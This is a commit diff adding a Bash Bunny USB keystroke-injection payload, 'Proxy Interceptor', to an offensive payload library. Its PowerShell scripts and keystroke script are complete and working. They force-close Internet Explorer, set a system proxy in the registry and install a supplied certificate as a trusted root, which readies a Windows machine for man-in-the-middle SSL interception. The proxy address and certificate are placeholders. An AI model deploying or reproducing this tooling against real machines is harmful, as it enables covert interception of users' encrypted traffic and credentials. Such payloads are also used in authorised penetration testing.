Added ProxyInterceptor payload (#82)

* Sets specified proxy and imports certificate for  MITM

* Update cert.pem

* Update README.md

* Update README.md

* Update README.md

* Update README.md

* Update README.md

* Update vars.ps1

* Update payload.txt

* Update README.md

* Update README.md

payloads/library/Proxy_Interceptor/ImportCert.ps1

@@ -0,0 +1,6 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Add certificate to certificate store
+$certFile = ( Get-ChildItem -Path $certName )
+$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root

payloads/library/Proxy_Interceptor/README.md

@@ -0,0 +1,30 @@
+# Proxy Interceptor for Bash Bunny
+
+Author: NightStalker
+
+Version: 1.0
+
+## Description
+
+This payload will enable a proxy and import an SSL certificate to a Windows
+computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+The script uses a combination of Ducky Code and PowerShell.
+
+*Note: Currently no falure LED, if remains red for more than 60 seconds
+script failed. Will build checks in later version.
+
+## Requirements
+
+Certificate needs to be in .pem format and in the root switch directory with
+payload.txt, set the certificate and proxy information in the vars.ps1 file.
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| White (blinking) | Script Running.                       |
+| Purple (blinging)| Script Complete.                      |
+
+## Discussion
+
+https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/

payloads/library/Proxy_Interceptor/SetProxy.ps1

@@ -0,0 +1,19 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
+Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
+$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
+if ($ieProcess) {
+	$ieProcess.CloseMainWindow()
+Sleep 5
+if (!$ieProcess.HasExited) {
+    $ieProcess | Stop-Process -Force
+  }
+}
+Remove-Variable ieProcess
+
+#Change the proxy settings in the registry
+$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
+Set-ItemProperty -path $regKey ProxyEnable -value 1
+Set-ItemProperty -path $regKey ProxyServer -value $proxyVal

payloads/library/Proxy_Interceptor/cert.pem

@@ -0,0 +1,4 @@
+-----BEGIN CERTIFICATE-----
+REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
+FROM PROXY FOR SSL INTERCEPTION.
+-----END CERTIFICATE-----

payloads/library/Proxy_Interceptor/payload.txt

@@ -0,0 +1,65 @@
+#!/bin/bash
+#
+# Title:         Proxy Interceptor
+# Author:        NightStalker
+# Version:       1.0
+#
+#This payload will enable a proxy and import an SSL certificate to a Windows
+#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+#The script uses a combination of Ducky Code and PowerShell.
+#
+# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
+#
+# Red Blinking.............Running Payload
+# Purple Blinking .........Payload Completed
+
+#Set Red LED to indicate Starting of Script
+LED R 50
+
+#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
+ATTACKMODE HID STORAGE
+
+#Import Bunny Helpers
+source bunny_helpers.sh
+
+#Start of Script 
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 100
+
+#Change to the directory of the Bunny with the proper switch location
+Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
+Q ENTER
+Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
+Q ENTER
+Q STRING cd \$absPath
+Q ENTER
+Q DELAY 500
+
+#Set the proxy in the internet settings in the registry (For IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
+Q ENTER
+Q DELAY 500
+
+#Import the certificate to the computer (for IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 500
+
+#Unmount the USB Drive.
+Q STRING \$driveEject = New-Object -comObject Shell.Application
+Q ENTER
+Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
+Q ENTER
+Q DELAY 500
+Q ALT t
+Q DELAY 500
+Q STRING EXIT
+Q ENTER
+sync
+LED R B 100

payloads/library/Proxy_Interceptor/vars.ps1

@@ -0,0 +1,3 @@
+#Set variables for use in payload.
+$proxyVal = "proxyip:port"
+$certName = "cert.pem"